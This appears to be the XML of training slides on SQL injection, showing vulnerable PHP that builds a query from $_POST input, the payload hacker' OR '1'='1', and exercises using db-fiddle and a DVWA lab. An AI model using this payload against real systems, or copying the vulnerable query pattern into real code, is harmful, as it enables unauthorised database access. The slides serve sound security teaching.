                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;email=jane@doe.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4EE1BD4-F18F-437B-8B2A-B5AF7BB3598C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4567535"/>
            <a:ext cx="5791200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 SQL Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle: Rounded Corners 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED68501-EF71-41FB-ACD8-2F3B4108D6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5320656"/>
            <a:ext cx="8534400" cy="92774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$query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“SELECT * FROM users WHERE name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Jane Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Then, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($query)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> makes the database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run this string as SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EF6E15-877E-49C0-B26F-B190FB70744F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="3182921"/>
            <a:ext cx="7215437" cy="923330"/>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 $name contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“Jane Doe”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$name = $_POST[“name”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query = “SELECT * FROM users WHERE name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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5026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94F20-5679-438E-94B7-D21556C04B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6538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5C0A43E-6B2C-4A63-96DC-FACD61A8BC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4504679"/>
            <a:ext cx="9144000" cy="600721"/>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CA170A7-2FF1-49D1-A607-F3786E0C13E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2590800"/>
            <a:ext cx="9144000" cy="186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50DF54-167B-487C-A869-5CFBE02B800A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="653854"/>
            <a:ext cx="9144000" cy="1860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80EA3D0-2D4F-4858-B9D3-DA27C9F46BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="370457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FAD2F2-EB85-4C8A-A9AF-73A29236B9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811749" y="3694418"/>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31631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320674" y="0"/>
            <a:ext cx="5470526" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E04006"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DF2F51-F6FA-4611-B10D-2ACF3B8316D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="762000"/>
            <a:ext cx="3312125"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1 User Submission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51B9E08-B81D-4B2D-94CC-2AE7BC354BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2738735"/>
            <a:ext cx="2151551"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2 PHP Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435C1F6C-D4F5-4FAE-A3D7-7D42698BCE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="1273497"/>
            <a:ext cx="5974713" cy="1200329"/>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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getUserInfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.api.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name=hacker’+OR+’1’=‘1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;email=jane@doe.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4EE1BD4-F18F-437B-8B2A-B5AF7BB3598C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4567535"/>
            <a:ext cx="5791200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 After Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle: Rounded Corners 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED68501-EF71-41FB-ACD8-2F3B4108D6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5320656"/>
            <a:ext cx="8534400" cy="92774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$query =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“SELECT * FROM users WHERE name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hacker’ OR ’1’=‘1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>valid SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, but is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> the query the DB was meant to run!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EF6E15-877E-49C0-B26F-B190FB70744F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="3182921"/>
            <a:ext cx="7215437" cy="923330"/>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 Contains “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hacker’ OR ’1’=‘1’”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$name = $_POST[“name”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query = “SELECT * FROM users WHERE name=‘$name’;”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2990593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Submitting SQL through a form can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14828"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trick the server into running queries it shouldn’t.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2871227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3136613"/>
            <a:ext cx="8763000" cy="584775"/>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This is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14828"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D14828"/>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93112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This allows attackers to run their own SQL queries by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“re-writing” server-side code!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3144483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dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll practice “plugging in” different user-input values to build queries just like servers do. This will prepare you to build fully functional SQL injections in upcoming exercises.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" u="sng"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Load the fiddle at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.db-fiddle.com/f/gAkPEQwVW7EsAnm3xuUJGx/0</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Refer to the scenario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endParaRPr lang="en-US"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SQL Substitutions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68784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SQL Substitutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2282783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dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll inject an OR clause into a SQL statement to “trick” the database into retrieving more information than it should. You’ll build on this technique to bypass a login form in the next exercise.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" u="sng"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Launch DVWA with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run --rm –p 80:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
